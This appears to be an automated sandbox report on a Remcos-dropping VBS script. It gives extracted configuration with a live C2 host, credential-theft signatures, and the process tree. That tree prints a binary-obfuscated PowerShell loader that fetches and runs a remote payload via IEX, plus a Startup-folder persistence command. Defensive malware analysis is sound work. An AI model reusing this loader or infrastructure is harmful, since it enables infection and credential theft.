Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
09-09-2022 16:16
General
-
Target
c1d6fcea01ed82777e63ebc9e6f085ce.vbs
-
Size
2KB
-
MD5
c1d6fcea01ed82777e63ebc9e6f085ce
-
SHA1
5497cee7b0f9b4f7f81491779e88edd83f167a15
-
SHA256
de7a6bf628cdb1265197ea78967808850230114acb014cd0a39aa36adf2832f7
-
SHA512
d1ea396de7dc2204733d113e2fed0d89b93c61cf7165ff9798a858712a81c4d9ad6a78eb0f75271f9df9e590d85c9e328ee9ce1348d01c66e0a446cda8d07611
Score
10/10
Malware Config
Extracted
Family
remcos
Botnet
AUGB22
C2
saptransmissions.dvrlists.com:55026
Attributes
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
AUGB22
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
AUGB22-JJZGN0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Nirsoft 4 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 32 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 12 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01010110,01101001,01110011,01100001,00101111,01010000,01100001,01111001,01100001,01100010,01101100,01100101,01110011,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='I' + 'EX';sal P $o00;([system.String]::Join('', $gf))|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrtfcjms"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrtfcjms"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrtfcjms"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrtfcjms"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrtfcjms"4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glgydcwmfvmf"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glgydcwmfvmf"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glgydcwmfvmf"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glgydcwmfvmf"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glgydcwmfvmf"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\glgydcwmfvmf"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rnmrwuhntdekvas"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1d6fcea01ed82777e63ebc9e6f085ce.vbs'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:916 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\wrtfcjmsFilesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5856a9194283ebea50cbe96fb0755420e
SHA19d08c6b37850aa306c3d7ba7a3a093fdc806ad5d
SHA2568c561e77d7b62b4864208db01bdc0df8ab8c7fae7cb2fc6e20137cea99f8ab0e
SHA512004cf55f7258762facf65701793114e0637a42a73784fb5fe165c7a1080a9bd1bfececc3de052d3ff7780246e1e8740f817aa0973daff21b8088c7584a6d6229
-
\Users\Admin\AppData\Local\Temp\2101ac6b-6b9b-440a-8e07-e6cc53c9bc33\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
memory/596-92-0x00000000024FB000-0x000000000251A000-memory.dmpFilesize
124KB
-
memory/596-69-0x00000000024FB000-0x000000000251A000-memory.dmpFilesize
124KB
-
memory/596-56-0x0000000000000000-mapping.dmp
-
memory/596-60-0x000007FEF4480000-0x000007FEF4EA3000-memory.dmpFilesize
10.1MB
-
memory/596-66-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/596-74-0x000007FEF3030000-0x000007FEF31B4000-memory.dmpFilesize
1.5MB
-
memory/596-64-0x000007FEF3920000-0x000007FEF447D000-memory.dmpFilesize
11.4MB
-
memory/596-91-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/596-67-0x000000001B950000-0x000000001BC4F000-memory.dmpFilesize
3.0MB
-
memory/596-77-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/672-100-0x0000000000422206-mapping.dmp
-
memory/672-103-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/896-55-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmpFilesize
8KB
-
memory/896-54-0x0000000000320000-0x0000000000330000-memory.dmpFilesize
64KB
-
memory/932-99-0x0000000000455238-mapping.dmp
-
memory/932-108-0x0000000000400000-0x0000000000457000-memory.dmpFilesize
348KB
-
memory/932-105-0x0000000000400000-0x0000000000457000-memory.dmpFilesize
348KB
-
memory/1460-79-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-86-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-75-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-81-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-82-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-83-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-84-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-96-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-88-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-89-0x00000000004327A4-mapping.dmp
-
memory/1460-107-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-76-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1460-93-0x0000000075B41000-0x0000000075B43000-memory.dmpFilesize
8KB
-
memory/1460-94-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/1760-71-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/1760-70-0x00000000024FB000-0x000000000251A000-memory.dmpFilesize
124KB
-
memory/1760-68-0x000000001B850000-0x000000001BB4F000-memory.dmpFilesize
3.0MB
-
memory/1760-63-0x000007FEF3920000-0x000007FEF447D000-memory.dmpFilesize
11.4MB
-
memory/1760-65-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/1760-62-0x000007FEF4480000-0x000007FEF4EA3000-memory.dmpFilesize
10.1MB
-
memory/1760-72-0x00000000024FB000-0x000000000251A000-memory.dmpFilesize
124KB
-
memory/1760-57-0x0000000000000000-mapping.dmp
-
memory/2024-97-0x0000000000476274-mapping.dmp
-
memory/2024-104-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB